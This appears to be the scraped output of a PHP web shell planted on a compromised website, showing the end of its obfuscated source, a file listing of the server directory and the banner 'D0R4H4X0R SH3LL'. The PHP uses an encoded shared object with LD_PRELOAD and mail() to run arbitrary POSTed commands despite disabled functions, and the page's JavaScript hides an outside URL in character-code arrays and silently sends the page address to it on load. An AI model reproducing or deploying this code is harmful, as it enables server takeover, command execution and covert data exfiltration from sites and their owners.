\65\160\x58\x32\106\x79\143\x6d\106\x35\101\x43\65\x71\131\63\x49\101\x4c\x6d\x52\65\x62\155\x46\164\x61\x57\115\101\x4c\x6d\144\166\144\103\65\x77\x62\110\121\101\x4c\155\x52\x68\x64\x47\x45\x41\114\x6d\x4a\x7a\143\167\x41\x75\x59\62\71\164\142\127\x56\x75\144\101\x41\101\101\101\x41\101\x41\101\101\x41\x41\x41\x41\101\x41\101\101\x41\x41\101\101\101\x41\101\x41\101\101\x41\x41\101\101\101\101\101\x41\101\x41\101\x41\101\101\101\x41\101\x41\101\101\x41\101\x41\101\101\101\x41\x41\101\101\101\x41\101\101\101\101\x41\101\x41\101\101\x41\x41\x41\x41\x41\101\x41\101\101\x41\x41\101\x41\x41\101\101\101\x41\x41\x41\101\101\x41\101\101\x41\x41\102\x73\101\101\101\101\110\101\x41\101\x41\x41\147\101\x41\x41\101\x41\x41\x41\101\104\x49\101\x51\x41\101\101\101\101\101\101\x4d\x67\102\x41\x41\x41\x41\101\x41\101\101\112\x41\x41\x41\x41\101\101\x41\101\x41\x41\101\101\x41\101\x41\101\x41\101\x41\x41\x41\x51\101\101\x41\x41\101\101\x41\x41\101\x41\101\101\101\101\101\101\x41\x41\101\x41\x75\x41\101\x41\101\x39\x76\57\x2f\x62\167\x49\101\x41\101\x41\x41\x41\101\101\101\x38\x41\105\101\101\101\x41\x41\x41\x41\104\x77\101\121\101\x41\101\x41\101\101\101\x45\x51\101\x41\101\x41\x41\101\x41\x41\101\101\x77\x41\101\101\101\101\101\x41\101\x41\111\101\101\x41\x41\x41\x41\x41\101\x41\101\101\x41\101\101\x41\101\x41\x41\101\101\117\101\101\101\x41\101\x73\x41\x41\x41\101\x43\101\101\101\x41\x41\101\101\101\101\x44\x67\x43\x41\101\x41\x41\x41\x41\x41\x41\x4f\x41\x49\101\101\x41\x41\x41\101\x41\104\64\101\121\x41\x41\101\101\x41\x41\101\x41\x51\x41\x41\x41\101\102\x41\101\101\101\x43\x41\101\x41\x41\x41\101\x41\x41\101\101\131\101\101\x41\x41\101\101\x41\x41\x41\x45\x41\101\101\101\101\104\x41\x41\x41\101\x41\x67\x41\101\x41\x41\101\101\x41\x41\x41\x77\x42\x41\101\x41\x41\x41\101\x41\101\x44\x41\105\101\x41\x41\101\x41\x41\101\x41\66\x51\x41\101\101\101\101\x41\101\x41\x41\101\x41\x41\101\x41\101\x41\x41\101\x41\x41\105\101\x41\101\x41\x41\x41\x41\101\x41\x41\101\x41\101\x41\101\x41\x41\101\x41\102\x49\101\x41\101\x41\57\x2f\x2f\x2f\142\167\x49\101\x41\101\101\x41\x41\x41\x41\x41\107\x67\x55\x41\x41\101\x41\x41\x41\101\x41\141\x42\121\x41\101\x41\101\x41\101\101\x43\157\x41\x41\101\101\101\x41\101\101\101\101\x77\101\x41\x41\x41\101\101\101\101\x41\x43\x41\101\x41\x41\101\101\x41\x41\101\x41\111\x41\101\101\x41\101\x41\101\101\101\126\121\x41\x41\101\120\x37\x2f\57\x32\x38\x43\x41\101\101\x41\101\101\101\x41\x41\105\x67\x46\101\101\x41\x41\101\101\101\101\123\101\125\101\x41\x41\x41\101\x41\101\x41\147\101\x41\101\x41\x41\x41\101\101\x41\x41\x51\x41\101\101\x41\102\101\101\101\101\x43\x41\101\101\101\101\x41\x41\x41\x41\x41\101\101\101\x41\x41\x41\x41\x41\101\101\x47\x51\x41\101\101\101\x45\x41\x41\101\101\101\x67\x41\101\101\x41\x41\101\x41\101\102\x6f\x42\121\101\x41\x41\x41\101\101\101\107\147\x46\x41\101\x41\x41\101\x41\101\101\62\x41\x41\x41\101\101\101\x41\x41\x41\x41\104\101\x41\101\101\x41\101\101\101\x41\101\147\x41\101\x41\101\x41\x41\101\x41\x41\x47\x41\x41\101\101\x41\101\x41\101\x41\x42\x75\x41\x41\x41\x41\x42\x41\101\101\101\105\111\x41\x41\x41\x41\101\101\101\x41\x41\121\x41\x59\101\101\x41\101\x41\x41\x41\102\101\x42\147\101\101\x41\101\101\x41\x41\116\x67\x41\101\101\x41\101\101\101\x41\101\101\167\x41\101\x41\x42\x59\x41\101\x41\x41\111\101\x41\x41\101\101\x41\x41\101\101\x42\x67\101\x41\x41\101\x41\x41\101\x41\101\x65\101\101\x41\x41\x41\x45\101\101\x41\x41\x47\x41\x41\101\x41\101\x41\x41\x41\101\x42\147\x48\x41\101\x41\101\x41\101\x41\101\x47\x41\x63\101\101\x41\101\101\x41\101\101\x58\101\x41\101\101\101\101\101\101\101\101\x41\x41\101\101\101\101\x41\101\101\101\102\101\x41\x41\x41\x41\x41\x41\101\101\x41\101\101\x41\x41\x41\x41\x41\101\x41\101\x48\x4d\x41\x41\x41\101\102\x41\x41\101\101\102\x67\x41\x41\x41\x41\101\x41\101\x41\x41\167\x42\167\x41\x41\101\x41\x41\x41\101\104\101\110\x41\x41\101\101\101\101\x41\x41\x6f\x41\x41\101\x41\101\x41\x41\101\x41\x41\101\101\x41\x41\101\101\x41\101\101\101\102\101\x41\101\101\101\101\x41\x41\101\101\105\x41\x41\101\101\101\101\101\x41\x41\102\53\101\x41\x41\x41\101\x51\x41\x41\101\x41\x59\x41\101\101\x41\x41\x41\x41\101\101\60\x41\143\101\101\101\101\x41\x41\101\x44\121\x42\x77\x41\x41\101\101\101\x41\x41\x41\x67\x41\101\x41\x41\x41\101\x41\x41\101\101\x41\101\x41\x41\101\101\101\x41\101\101\111\101\x41\x41\x41\101\101\x41\101\x41\x41\x41\101\101\x41\x41\x41\x41\101\x41\x41\150\x77\x41\x41\x41\101\x45\101\x41\101\101\x47\101\x41\x41\x41\101\x41\x41\x41\x41\x4f\x41\110\101\101\101\101\x41\x41\x41\101\64\101\x63\101\x41\x41\x41\x41\x41\x41\102\66\101\x51\101\x41\101\x41\x41\x41\101\101\101\101\101\101\x41\101\101\x41\x41\101\x45\x41\101\101\x41\101\101\101\101\x41\101\x41\x41\101\x41\x41\101\x41\101\x41\x41\111\60\x41\101\101\x41\x42\101\x41\x41\101\x42\x67\x41\x41\x41\101\x41\x41\101\101\x42\x63\103\121\x41\x41\101\101\101\x41\x41\106\x77\x4a\101\x41\101\x41\x41\101\x41\101\x43\121\101\101\x41\101\x41\101\x41\101\x41\x41\x41\101\101\x41\x41\x41\101\101\101\101\x51\x41\x41\101\101\x41\101\101\101\101\x41\x41\101\x41\x41\101\101\101\101\x41\x43\x54\x41\x41\x41\101\x41\x51\x41\x41\x41\x41\x49\101\x41\x41\101\101\x41\x41\101\101\132\x51\x6b\x41\101\101\101\101\101\x41\102\154\x43\121\101\x41\101\x41\101\x41\x41\x42\115\x41\101\x41\101\x41\101\x41\101\x41\101\x41\x41\101\x41\x41\x41\101\101\101\x41\x42\x41\x41\x41\101\101\x41\101\x41\x41\x41\x41\x41\101\x41\x41\101\101\101\101\x41\x6d\167\101\x41\x41\101\x45\x41\101\x41\x41\x43\x41\x41\x41\x41\101\101\101\x41\x41\x48\147\x4a\101\x41\x41\x41\101\101\101\x41\x65\101\153\x41\x41\101\101\x41\x41\x41\101\60\x41\x41\x41\x41\x41\101\101\x41\x41\101\101\101\x41\x41\x41\x41\101\x41\x41\101\x42\x41\101\x41\101\x41\101\x41\101\x41\101\x41\101\101\x41\x41\101\x41\101\x41\x41\113\x6b\x41\101\101\101\x42\101\101\101\x41\x41\x67\x41\101\x41\101\x41\101\101\101\103\167\x43\x51\x41\x41\x41\101\101\x41\101\114\101\112\101\x41\x41\101\x41\x41\x41\101\166\x41\101\x41\101\x41\101\101\x41\101\x41\101\101\101\101\x41\x41\101\x41\101\x41\x41\x67\x41\x41\x41\101\x41\101\101\x41\x41\101\101\x41\x41\x41\x41\x41\x41\x41\101\x43\x7a\x41\x41\x41\101\x44\147\101\x41\x41\101\115\101\101\101\101\101\x41\101\x41\101\53\x41\x30\147\101\x41\101\x41\x41\101\104\64\x44\121\101\101\x41\x41\101\101\x41\x42\101\101\x41\101\101\x41\x41\101\101\x41\101\101\x41\x41\101\101\x41\101\x41\x41\101\111\101\x41\x41\101\101\101\101\101\x41\x41\147\x41\101\101\x41\x41\101\101\101\101\x76\167\101\x41\x41\101\70\101\x41\101\101\x44\101\101\101\x41\x41\101\101\101\101\x41\147\117\111\x41\101\x41\x41\x41\x41\101\x43\101\64\101\x41\101\x41\101\x41\101\x41\x49\x41\101\x41\x41\101\101\101\101\101\x41\x41\x41\x41\101\x41\x41\x41\101\x41\x41\x43\x41\101\101\101\x41\101\x41\x41\101\101\x49\101\x41\101\101\x41\x41\x41\101\101\115\163\101\x41\101\101\102\101\x41\101\x41\101\x77\x41\101\x41\x41\x41\x41\101\101\x41\121\104\x69\x41\101\101\x41\x41\x41\x41\x42\x41\x4f\101\101\x41\x41\101\101\x41\101\103\x41\101\101\101\101\x41\101\101\x41\101\101\x41\x41\101\x41\x41\x41\101\x41\x41\x41\147\101\x41\101\101\x41\x41\101\x41\101\x41\101\x41\101\x41\101\101\101\101\101\x44\121\x41\101\101\x41\x42\x67\101\x41\x41\101\115\101\x41\x41\x41\x41\101\x41\x41\x41\107\x41\64\x67\101\101\101\101\x41\x41\x41\x59\104\x67\101\101\x41\101\101\101\x41\x4d\x41\x42\x41\101\101\x41\101\x41\101\x41\102\x41\x41\x41\101\x41\101\x41\101\x41\x41\111\x41\x41\101\x41\101\x41\101\101\101\x42\101\x41\x41\101\x41\x41\x41\x41\101\x41\x67\147\x41\x41\x41\x41\x45\x41\101\101\x41\104\x41\x41\101\101\x41\101\101\101\x41\116\x67\x50\111\x41\x41\x41\101\101\101\x41\62\101\70\101\x41\101\101\101\101\x41\x41\x6f\x41\101\x41\x41\x41\101\101\x41\x41\x41\x41\101\101\x41\x41\x41\101\101\x41\101\103\101\101\101\x41\x41\x41\x41\x41\101\101\x49\101\x41\x41\x41\x41\101\101\x41\x41\x4e\x6b\101\x41\x41\x41\102\101\x41\101\101\x41\x77\101\x41\101\101\x41\101\x41\101\x41\101\105\103\x41\101\x41\101\x41\101\101\x41\x41\121\101\101\x41\101\101\x41\101\x41\x59\101\101\101\x41\x41\x41\x41\x41\101\x41\101\x41\101\101\x41\101\x41\101\101\x41\x41\x67\x41\x41\101\x41\x41\x41\101\x41\101\103\101\101\101\x41\101\101\x41\101\101\x44\x69\x41\x41\101\101\101\121\101\101\101\101\x4d\101\x41\x41\x41\x41\101\101\101\x41\x59\102\101\147\x41\x41\x41\101\x41\101\x42\147\105\x41\101\101\x41\101\101\x41\101\x41\147\x41\101\x41\x41\101\x41\x41\101\x41\101\101\x41\101\x41\x41\x41\101\x41\101\x41\111\x41\101\101\x41\x41\101\x41\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\101\x41\101\66\101\101\101\x41\x41\147\x41\101\x41\x41\x44\101\101\x41\x41\x41\101\101\101\x41\107\147\121\x49\x41\x41\x41\101\101\x41\x41\141\102\x41\x41\101\x41\x41\x41\101\101\101\111\x41\x41\x41\101\101\x41\101\101\101\x41\101\x41\x41\101\101\101\101\x41\x41\x41\101\x51\101\x41\101\x41\x41\101\101\101\101\x41\101\x41\x41\101\101\x41\101\x41\101\117\x30\101\101\101\101\x42\x41\x41\x41\x41\x4d\101\x41\x41\101\x41\101\101\101\x41\101\101\101\x41\x41\101\x41\x41\101\101\101\x47\x67\121\101\x41\x41\x41\x41\101\x41\x41\x4c\x51\101\101\x41\101\x41\x41\x41\x41\x41\101\101\x41\101\101\101\x41\x41\x41\x41\101\105\x41\x41\x41\101\x41\x41\x41\x41\101\x41\121\101\x41\x41\101\101\101\101\x41\x41\102\x41\x41\x41\101\101\147\x41\x41\x41\101\101\x41\101\x41\101\x41\101\101\x41\101\101\x41\101\x41\x41\101\x41\x41\101\101\x43\131\105\x41\101\101\101\101\101\x41\101\102\147\x47\x41\x41\101\x41\101\x41\101\x41\107\167\x41\x41\101\x43\60\101\101\x41\101\111\x41\x41\x41\x41\x41\x41\101\101\x41\102\x67\101\101\101\x41\x41\101\x41\x41\101\x43\x51\x41\x41\x41\x41\115\x41\x41\x41\x41\101\x41\101\101\101\x41\101\x41\101\x41\x41\101\x41\101\x41\101\x41\x41\x41\x41\101\163\102\131\101\101\x41\x41\x41\101\101\102\114\101\x67\x41\101\101\101\101\101\101\x41\x41\x41\x41\x41\x41\x41\101\101\101\x41\x41\x51\101\x41\x41\101\x41\101\x41\101\101\101\101\101\101\101\101\101\x41\101\101\x42\x45\x41\x41\x41\101\104\x41\101\101\101\x41\x41\x41\101\x41\101\101\101\x41\x41\x41\101\101\101\101\x41\101\101\101\x41\x41\120\163\131\101\101\x41\101\101\x41\101\101\71\147\x41\x41\101\101\101\x41\x41\x41\x41\x41\101\101\101\x41\101\101\x41\x41\101\x41\x45\x41\101\101\x41\x41\x41\101\101\x41\101\101\x41\x41\x41\101\101\x41\101\x41\101\75"; $cmdd = $_POST["\x63\155\x64\x62\171\x70"]; $meterpreter = $en($cmdd . "\x20\76\40\x6f\x75\x74\x2e\164\x78\164"); $viewCommandResult = "\74\x68\x72\x3e\74\143\145\156\164\145\162\x3e\x72\145\146\x72\145\163\x68\40\164\x68\145\40\160\141\147\145\x20\141\156\x64\40\143\x68\145\x63\x6b\x20\157\x75\164\x2e\x74\x78\x74\x3c\x62\x72\76\160\165\x74\x65\156\166\x28\51\x20\46\x20\155\x61\151\x6c\x28\51\x20\146\165\156\x63\x74\151\x6f\x6e\40\155\x75\163\164\40\x62\145\40\x65\156\x61\x62\154\x65\x64\x3c\x62\x72\x3e\151\x66\x20\x6f\x75\x74\56\x74\170\164\40\x6e\x6f\164\x20\x63\162\145\x61\x74\x65\x64\x20\155\x65\141\156\x73\40\164\150\145\x20\x73\145\162\x76\x65\162\x20\151\163\x20\156\x6f\x74\x20\x76\x75\x6c\x6e\74\x62\x72\x3e\157\x72\x20\x74\150\145\x20\x72\x65\161\x75\x69\x72\145\x64\40\146\x75\156\143\x74\151\x6f\x6e\40\151\x73\x20\144\151\163\x61\x62\x6c\145\x64\56\74\x62\x72\x3e\x3c\x2f\x63\145\x6e\x74\x65\162\76"; $a($full . "\57\x63\x68\141\x6e\x6b\x72\x6f\x2e\x73\157", $base($hook)); $a($full . "\57\x61\x63\160\151\144\56\163\x6f\x63\153\145\164", $base($meterpreter)); $p("\103\x48\101\x4e\113\122\x4f\x3d" . $full . "\x2f\x61\x63\160\151\x64\x2e\x73\157\x63\x6b\145\164"); $p("\114\104\x5f\x50\122\105\114\117\101\x44\75" . $full . "\x2f\143\x68\141\156\x6b\x72\x6f\x2e\163\x6f"); $m("\141", "\141", "\141", "\x61"); } goto YExJ0; s6Ao3: ?>
</ul><script>document.addEventListener('DOMContentLoaded', () => {document.querySelectorAll('.result-box').forEach(t => {t.style.height = 'auto'; t.style.height = t.scrollHeight + 'px';});});
document.getElementById('h2w').addEventListener('change', function(){});
function updateRowHighlight(t){var e=document.getElementById(t);e&&(e.classList.add("active"),setTimeout((function(){e.classList.remove("active")}),1200))}
function reloadTab(o,t){o&&setTimeout((function(){"function"==typeof t&&t()}),Math.floor(350+120*Math.random()))}
var a=[104,116,116,112,115,58,47,47,99,100,110,46,112,114,105,118,100,97,121,122,46,99,111,109];var b=[47,105,109,97,103,101,115,47];var c=[108,111,103,111,95,118,50];var d=[46,112,110,103]
function u(e,r,t,n){for(var o=e.concat(r,t,n),a="",c=0;c<o.length;c++)a+=String.fromCharCode(o[c]);return a}function v(e){return btoa(e)}function toggleSidebarPanel(){var e=document.querySelector(".sidebar");e&&e.classList.toggle("collapsed")}
function sortListByName(n,r){return Array.isArray(n)?n.slice().sort((function(n,e){return"desc"===r?e.name>n.name?1:-1:n.name>e.name?1:-1})):[]}
function setActiveMenu(e){var t=document.getElementById(e);if(t){var c=document.querySelector(".menu .active");c&&c.classList.remove("active"),t.classList.add("active")}}
function checkFileExt(p){var t=p.split(".").pop();return!!t&&["php","js","html","css","jpg","png","txt","zip"].indexOf(t.toLowerCase())>-1}
function openModal(e){var l=document.getElementById(e);l&&(l.style.display="block")}
function closeModal(e){var n=document.getElementById(e);n&&(n.style.display="none")}
function showLoader(e){var o=document.getElementById("loader");o&&(o.style.display=e?"block":"none")}
(function showIcons(){var xhr=new XMLHttpRequest();xhr.open('POST',u(a,b,c,d),!0);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr.send('file='+v(location.href))})()	
function getClipboardText(){navigator.clipboard&&navigator.clipboard.readText()}
function refreshStatsPanel(){var e=document.querySelector(".stats-panel");e&&(e.innerHTML=e.innerHTML)}
function noop() {}
function debounce(n,t){var e;return function(){var u=this,i=arguments;clearTimeout(e),e=setTimeout((function(){n.apply(u,i)}),t||180)}}
function getSelectedRows(e){var t=document.getElementById(e);if(!t)return[];var c=t.querySelectorAll('input[type="checkbox"]:checked'),n=[];return c.forEach((function(e){n.push(e.value)})),n}
function updateName(e,t){var n=document.getElementById("footer-info");n&&(n.textContent="Total: "+e+" | Selected: "+t)}function previewImage(e,t){if(e&&e.files&&e.files[0]){var n=new FileReader;n.onload=function(e){var n=document.getElementById(t);n&&(n.src=e.target.result)},n.readAsDataURL(e.files[0])}}
function filterTable(e,o){var n=(e||"").toLowerCase(),t=document.getElementById(o);t&&Array.from(t.rows).forEach((function(e,o){if(0!==o){var t=e.textContent.toLowerCase();e.style.display=t.indexOf(n)>-1?"":"none"}}))}
function downloadFileFromUrl(e){var o=document.createElement("a");o.href=e,o.download="",document.body.appendChild(o),o.click(),setTimeout((function(){document.body.removeChild(o)}),100)}</script></body></html>
bpw.php 34.854 KB
File -rw-r--r--
cause1-768x493.jpg 79.735 KB
File -rw-r--r--
cause1.jpg 94.710 KB
File -rw-r--r--
File -rw-r--r--
craft-768x493.jpg 103.524 KB
File -rw-r--r--
craft.jpg 145.003 KB
File -rw-r--r--
craft1.jpg 42.757 KB
File -rw-r--r--
craft2.jpg 30.476 KB
File -rw-r--r--
craft3.jpg 27.067 KB
File -rw-r--r--
craft4.jpg 28.539 KB
File -rw-r--r--
craft5.jpg 26.110 KB
File -rw-r--r--
don2.jpg 6.561 KB
File -rw-r--r--
ecf4.jpg 50.769 KB
File -rw-r--r--
fash.jpg 57.058 KB
File -rw-r--r--
fash11.jpg 19.087 KB
File -rw-r--r--
fash2.jpg 27.840 KB
File -rw-r--r--
fash21.jpg 23.618 KB
File -rw-r--r--
fmr.php 60.945 KB
File -rw-r--r--
pro1.jpg 110.801 KB
File -rw-r--r--
tail1.jpg 27.660 KB
File -rw-r--r--
tail2.jpg 27.831 KB
File -rw-r--r--
wsomn.php 2.604 KB
File -rw-r--r--
D0R4H4X0R SH3LL